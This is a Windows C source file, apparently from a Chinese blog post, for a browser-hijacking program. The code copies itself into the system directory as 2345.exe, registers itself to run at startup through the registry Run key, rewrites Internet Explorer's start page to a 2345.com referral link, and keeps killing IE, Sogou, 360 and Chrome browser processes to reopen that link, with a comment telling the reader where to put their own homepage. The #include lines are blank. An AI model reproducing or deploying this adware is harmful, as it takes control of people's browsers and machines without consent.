#include "stdafx.h"
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void copyrun();
BOOL GetProcess(DWORD pid);
DWORD GetProcessIdByName(char* name);
void mypage();
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow) {
	// TODO: Place code here.
	copyrun();

	if (INVALID_HANDLE_VALUE == CreateFile("C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) {
		ExitProcess(0);
	}
	mypage();
	DWORD explorer_ID = GetProcessIdByName("explorer.exe");
	if (explorer_ID) { //not zero
		while(1) {
			Sleep(1000);
			GetProcess(explorer_ID);
		}
	}
	return 0;
}


BOOL GetProcess(DWORD pid) {
	HANDLE hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    //建立进程快照
	if (INVALID_HANDLE_VALUE == hProcess) {
		printf("获取进程信息失败！！！\n");
		return FALSE;
	}
	//成功获取进程信息
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);
	BOOL moreProc = Process32First(hProcess, &pe32);
	while (moreProc) { //枚举所有进程
		_tprintf(_T("进程名称：%s\n"), pe32.szExeFile);
//parentid -> char
		if (pe32.th32ParentProcessID==pid) {
			if(!stricmp(pe32.szExeFile,"iexplore.exe") \
			        ||!stricmp(pe32.szExeFile,"SogouExplorer.exe")\
			        ||!stricmp(pe32.szExeFile,"360se.exe")\
			        ||!stricmp(pe32.szExeFile,"chrome.exe")) {
				char parentid[10];
				int kill_ret = 0;
				memset(parentid,0,10);
				itoa(pe32.th32ParentProcessID,parentid,10);
				HANDLE hKillProcess = NULL;
				hKillProcess = OpenProcess(PROCESS_TERMINATE,FALSE,pe32.th32ProcessID);
				if(hKillProcess != NULL)
					kill_ret = TerminateProcess(hKillProcess,0);
				if(kill_ret)
					ShellExecute(NULL,"open","C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE","http://www.2345.com/?kmianfeiwangba",NULL,SW_SHOWNORMAL);
			}
		}

		moreProc = Process32Next(hProcess, &pe32);
	}
	CloseHandle(hProcess);        //释放进程快照
	return TRUE;
}

DWORD GetProcessIdByName(char* name) {
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	if (hSnapshot == INVALID_HANDLE_VALUE) {
		CloseHandle(hSnapshot);
		return 0;
	}
	PROCESSENTRY32 pe32;
	DWORD id = 0;
	pe32.dwSize = sizeof(PROCESSENTRY32);
	if ( !Process32First(hSnapshot,&pe32) ) {
		CloseHandle(hSnapshot);
		return 0;
	}
	while ( 1 ) {
		pe32.dwSize = sizeof(PROCESSENTRY32);
		if (Process32Next(hSnapshot,&pe32) == FALSE)
			break;
		if ( strcmp(pe32.szExeFile,name)==0 ) {
			return pe32.th32ProcessID;
		}
	}
	CloseHandle(hSnapshot);
	return 0;
}

void mypage() {
	HKEY hKey;
	LONG lRet;
	lRet = RegOpenKeyExA(HKEY_CURRENT_USER,
	                     "Software\\Microsoft\\Internet Explorer\\Main",
	                     0,KEY_SET_VALUE, &hKey );
	if( lRet != ERROR_SUCCESS ) {
		return ;
	}
	LPCSTR data_Set="Start Page";
//只改以下一行内容，将字符串内容改成你想要的主页
	LPCSTR da="http://www.2345.com/?kmianfeiwangba";
//
	const BYTE * ta=(BYTE*)da;
	DWORD length=strlen((char*)ta)+1;
	lRet=RegSetValueExA(hKey,data_Set,0,REG_SZ,ta,length);
	if(lRet!=ERROR_SUCCESS) {
		return ;
	}
	RegCloseKey(hKey);
	return ;
}

void copyrun() {
	char modlepath[256];
	char syspath[256];
	GetModuleFileName(0,modlepath,256);//取得程序名字
	GetSystemDirectory(syspath,256);
	CopyFile(modlepath,strcat(syspath,"\\2345.exe"),1);
//加启动 ＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
	HKEY hKey;
	LPCTSTR lpRun = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRun, 0, KEY_WRITE, &hKey);
	if(lRet == ERROR_SUCCESS) {

//	char pFileName = {0};
//DWORD dwRet ;
// GetModuleFileName(NULL, pFileName, MAX_PATH);
		lRet = RegSetValueEx(hKey, "get2B", 0, REG_SZ, (BYTE *)syspath, strlen(syspath));
		RegCloseKey(hKey);
		if(lRet != ERROR_SUCCESS) {
		}
	}
	RegCloseKey(hKey);
}

本文链接:https://it72.com/9235.htm